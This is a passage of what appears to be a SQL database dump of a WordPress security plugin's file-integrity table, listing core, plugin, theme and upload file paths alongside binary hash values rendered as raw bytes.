���+�=��','\Z_��E(��z�mc����a��1&-�4)','',0,'?'),('�wʼnZ��-��\n��r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c�\Zම#\Z֭','��|N�\0��a69�A��1N�%+���','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('嚯�W,$�q�U��','wp-content/plugins/redirection/models/redirect/redirect-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UO8c��,Ϝdo��','��\'�QV=\n�W<5��U\0)�Լ�1-�9�','',0,'?'),('���8�|L�P� ','wp-content/plugins/wordpress-seo/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Li����������`�','����q�3��%�:��a�S�Q�Uә�e','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$�����\n���~�ln��','',0,'?'),('��&\'�I�u�f��b�','wp-content/plugins/wordpress-seo/languages/yoast-components-nl_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f%&#�b�@4\\�q\0;','�*/����a�]��+\"!��D���*y�E�>�','',0,'?'),('���TP��5�<��蜻','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/uk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<}��a���+|','b.��� L�F��Sf0`��\r���f��w{','',0,'?'),('�����һ9|��','wp-content/plugins/wordpress-seo/src/conditionals/premium-inactive-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�2�caJ%Q8`�;','�\Zê���Q�k�1\"f�+Y��)��g����(','',0,'?'),('��y�9*�I�H�h','wp-content/plugins/redirection/locale/redirection-gl_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��I�/�:��Z���','��XC�?;����x\"2C���wv����','',0,'?'),('���9n��w3�f=�B��','wp-content/plugins/redirection/actions/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' tLU?��/�}Pd`v','����w\r�߭C\0;K�\0ߏ��J,�躻�','',0,'?'),('��`}�GK�רoo�^','wp-content/uploads/2019/09/planning-permission-garden-768x576.jpg',0,'��-�No�YH^<ˋ>�,','��-�No�YH^<ˋ>�,','2��2����N�K�ף6��Uī�G�54W|�','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����9��2\0\00��8�','�~��������@�Փ�h ���u���3��i','',0,'?'),('�vџ�H���5%','wp-includes/blocks/site-logo/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0��]� ������','u=ˊ��h����]�?(�{D���6_�F��','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dܷ\0��d\'���','%�=r�WX%���x�{�T�t�l;#E�lXy','',0,'?'),('�6�n��[l��vq','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V\0�[R�>��Sj�$^�','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�@08a\\�3��u���','wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!H��Rk+3���Wx�','��b�h��̩sJ��rT�u�,*�,�]ގB','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('�T�V�5��.I','wp-content/uploads/2019/08/health2-updraft-pre-smush-original.jpg',0,'Ȣs���2�Q#s','Ȣs���2�Q#s','�c��tߒG.،[��6�U餒*�dV F�','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cY�\0����в�^�+','��N�eX��F2\\�-0t�8Fp�ɤVێ\0��','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g�?�Fb!}��ݿ��C��鳇','',0,'?'),('�g��wߍ�hm���A�','wp-includes/blocks/freeform/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z�%,̰�YN�',' �b�I9��w3ݱ�r?�2&WO�щmM�','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��#j�T�, ���D','x��L�a);�%��Ƶ���R*���','',0,'?'),('���,�X��æC��','wp-content/languages/plugins/wordpress-seo-en_GB-6dcfe7d6f2f2738b9629d7429efcdd82.json',0,'pnϴ%���\'ΑjE','pnϴ%���\'ΑjE','SϿ+UCc��\'@�}��)�}�/U�O8�U!�','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('�����AW�C��R','wp-content/uploads/2016/11/home-768x432.jpg',0,'ϙ�@���ex�����','ϙ�@���ex�����','�b���m�X�C�Ѝ:o�/�CWc�G!�|','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �*������{~��.','�\n��÷�˞x\'0 W~Ы��Z�src9��=','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pD*����L}�','��f���ƾߜ=i���s�8�\Z}�����','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��::�̿&D�P��\0�','�X�\r #a܅�\rH���#4�Z=�B]X�#�қ','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱�� -���f�rǏc�k��@�3�` =','',0,'?'),('�\n`m�H�I�i�M�','wp-content/themes/twentynineteen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yAk\'pnOW�`�����',']Ggp�x?_-lcw.9��kG�@��\Z��h%','',0,'?'),('��P\r���\\��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B��j�R���ȉ�','��ߛ���˂�/�-2^��� �����4�Ţ','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�Ah�8L�X�d�Ta�','�8D.�u+�h8Ҳž�,���Wڝ��O','',0,'?'),('�.�\nz��\\G���g','wp-content/plugins/wordpress-seo/src/integrations/abstract-exclude-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\ry���i�\0�d�zv','{��$o���|{?B�A[)m�}��e�ƅ�/z�','',0,'?'),('�/(\". ����}�Z�','wp-content/plugins/wordpress-seo/js/dist/languages/cs-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IAfGG��\n�=�E�-','�-�K�%����܄57���#�z-�Za���','',0,'?'),('�2\Z� {D�Z���-','wp-content/plugins/wordfence/fonts/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h��I�15[I]J','*��\\&�t䭨\\� gTw�����,�1���','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H`�Ō�D��xj��dD','�:��[�8�4���q�7S��d��g×(�*3','',0,'?'),('�_}k��%��B��\r','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�����hyb�','Ďj�<�%�d�a{sx�o�LJRx�o�','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި�,��V!�)p','Y|k�F��6a��[�tv.��K^�d�M�)onD','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a+�U�[*�����','1x�: r$Ó�ѯ��D>�`�K~��T6lm�','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�s�{���Cٗ��','~r�-r��� T�zT�[B�}�f�D0�y�d��','',0,'?'),('�\Z�I�������','wp-includes/blocks/social-links/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l� af\00M/��\Z�','�VM7�|�r��@\r{1w6��{&��m[r��','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('�ω*��дsZQ�O3\0','wp-content/languages/admin-en_GB.mo',0,'�,|;�t��wSWA}�','�,|;�t��wSWA}�','#��ՠ���pSm쇊��k��x|``c��~�5i�','',0,'?'),('�kN�>t��,���','wp-includes/blocks/file/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��M��T�o','H�4|QG��F�]�iu�>bL.NQ`g}\r\\�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn� i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����F�����5�','�$hp�>�4������S�Y�>X�B�ٙ','',0,'?'),('�ΐ��&>B����@��','wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4����6Yc�\"���','��l�3�vu��e�R�W$w{P{2�}`','',0,'?'),('����?\"/�@�8Ʒ)','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�ɫ�����e','w�ԾI��!٠\n�`�E����Ĥ������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ri)]f�m�+e�','i16�:�� n�s!�F���n��A��R6�/�NE','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����aH{ڶ��ER�N','տ����o\Z���^�J��U�B�l�5���\n�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��.�&xD�','v��=��E���.��Aͭ%�(DD4uis�','',0,'?'),('���5R�q�\Z�X�','wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�r�J�v�YP=B��','Vҡ����pE�gY�� l�U�{�܃Rʭ{1V\\','',0,'?'),('����)0{��x�','wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�uW֗rLT6���','͘\rD�mj��E�@��ֹu6�\\��_kXpJ�Rb','',0,'?'),('�~�W��S�~�Q�','wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5&H�J����','G�WQeN~T��EH��s�j��p�\"�n�����','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E,bٿʊ�N��E\\','|J��\Z^(������xDsX��8��?�R','',0,'?'),('���^��s|w�L�','wp-content/plugins/wordpress-seo/src/config/researcher-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:� d�O�>\'�i/','�Y��YA5����30���J 0������\'','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�Hx^�:�\"��\\���-','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��,Q-9���+RDNT','�皬�������sߒ �ܬ,�9���R�z�','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�S�I����#���)|','wp-includes/blocks/quote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��U��b7���','�T�~hqOL�gL����̀;l[0��\"��','',0,'?'),('�b+��a�X����X','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!h��\0,� ��%','˃\\B\n��G/͉Cw���9�,$��ŐJ!�8&','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^
�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W�� �3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('��q��8O��;�A','wp-includes/blocks/shortcode/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),('�\0�]�p��ޑ� \rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�[��M7q�#�P�n','F����7z+�X�}f�Bc<�CU�<��݀��','',0,'?'),('�s�X�3���f�$','wp-includes/blocks/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�@�j���?%W3 �',']u|�X�`���\Zҕ��H+a���fx��N�','',0,'?'),('��e�ȫÆT�k߇&�','wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���rN�����E��t','t �A�2K�;e$��=��[���W���l�','',0,'?'),('������dvoNf;','wp-content/plugins/redirection/locale/redirection-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�!��|b��=��','oX���>BK�vs�p�s���7 W���','',0,'?'),('謤j��,����=>','wp-includes/blocks/site-logo/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���6;��9�ޝ<��{','I\Z�5��x�J�?��6����jO�Khx[E%_','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','�� �<�(*Wv���Ћtw��r_��t�i� ','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ti��|f��6?\rS','��8{������Mz~\0Ke��?.��|n�o� �U','',0,'?'),('��<|Ɔ3#�`�}�','wp-includes/blocks/separator/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]=�u\'\\DE�T�','.f�L��]�Ã�Zb�|�%�{�M8�Ƅ�Q�p2^','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('��U�MU����$�','wp-includes/blocks/latest-posts/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�-����\'�u\ZQ��','W�����!kQ��%f�I�\0�ٹ�r?��','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z �\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�\"�e��AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_ ܹ k��\rP�`�8�c�','',0,'?'),('�(��Y�9��c��`�','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WhCQŒ��S�J�:','�x2a/,Z�1�\"�ᑂ���ȍ�i����','',0,'?'),('�,<�E´&���ze�M','wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZH�<�Md�{#7�p�','x4�J*$�k�n���nY}��\\b�,��','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/ ��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-m������#�','��\"��dgW�-�`wɅ�3�Ɍ/�_1���','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�� ��Rq�A��','u��j�h�&Q��\'�+�Gҗ*!9��1$W��m','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)j#�\Z>���+фd','{{��2��\r�ȼC\r8�y�1R�B��.X','',0,'?'),('�uch(�TT:z9�ʪ','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-components.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��5�A8��]םz','�\"�����?X�w�Z|�0��i|\"8���1\n','',0,'?'),('�u�{������N֫��','wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N!/�(���q��P�+','&u| +�Mv>�X�Pi�����qh����~��','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N���� rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nҤ&�i��\r�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('�Z+*rn�H�M_/2','wp-content/uploads/2019/08/nature-3336524_960_720-150x150.jpg',0,'.�c�O˙ji�#)y�z','.�c�O˙ji�#)y�z','#T�q�R�/�;��{z�o����&\0�p�2�','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�>B���25�\r1U*�','O ���h^dLgz���Iw�vƄaZ1��','',0,'?'),('�tLH�:��P(��','wp-includes/css/dist/widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gz�@�A��z�Q�8','ʳ�*�\Z�K�@¸0�V�H� �}yڦ�_>�u �','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('�c�8��x���ϵ','wp-includes/blocks/preformatted/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��K���6��!T�','wp-includes/blocks/heading/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�F����`����\\#O','jC,�U�Ma��\\kdD��wi�ۭ�','',0,'?'),('�*��lw�-3ܸ*)�','wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Ͻm���Vq:�AD','�\"�� HH_��a�1z��3�\':�D%��','',0,'?'),('� �1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J ��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�>���P����t_','�~�7��H{����]�\r:����\r�c���','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�d=o�V�x���','��`(���-�n2�\0n?hc���Y��-���','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q �!�@�٧T\r',' �Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�Q�A� �=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�^�����Ԧr��.��','wp-content/themes/vega/sample/images/recent-news-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8{4�Ŏ*��?���','��n�2Zɚ��3�[l�\0���ѭ��,2�&�','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��о�6������','r�\nz���>���g�i��\ru��u<��F','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K� 5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('�~#I��3\r_�����','wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�r�Ծԕ�5��','\Z��/�Z� )DTDs�P���\0O3k�M��M','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M,��|7��\"ߎ\'�','B�����@�{���6\r��$υ@�ĭ�+�','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('��M�uÞZh���ӷ','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��n���^���O','�1���(!&�;%k>L�aa�_:�\\к�r(','',0,'?'),('�{F�(L�O�t+B','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-updraft-pre-smush-original.jpg',0,'�6`�엀!����\Z��','�6`�엀!����\Z��','C�� v�\0ABfJ\'f0��=/=�|�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�nM�z{��\0��','����@�L��D��.��I�\0��ń�(c�X','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٶ��h�rdG�Ͷ','�_7� 2w-Tb� -��710εA����f','',0,'?'),('�\"�t���3q�?�','wp-includes/blocks/query-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DX�p��\Z��y?w����','n灴U����¢�H������ZO���h�?\r','',0,'?'),('�$Y��pj�f�G@L4','wp-content/uploads/2019/10/plumbing-768x510.jpg',0,'#Ӑ�7ٞGq��!\Z�','#Ӑ�7ٞGq��!\Z�','����}�VM�F�Z��}#�2�����K\0Upi','',0,'?'),('�*͵(�.e��n1A','wp-content/uploads/2019/12/pexels-photo-164005-150x150.jpeg',0,'3(�S6�>�n���[n�','3(�S6�>�n���[n�','�^��-h�cu5�T��q?3����kX�i��','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� 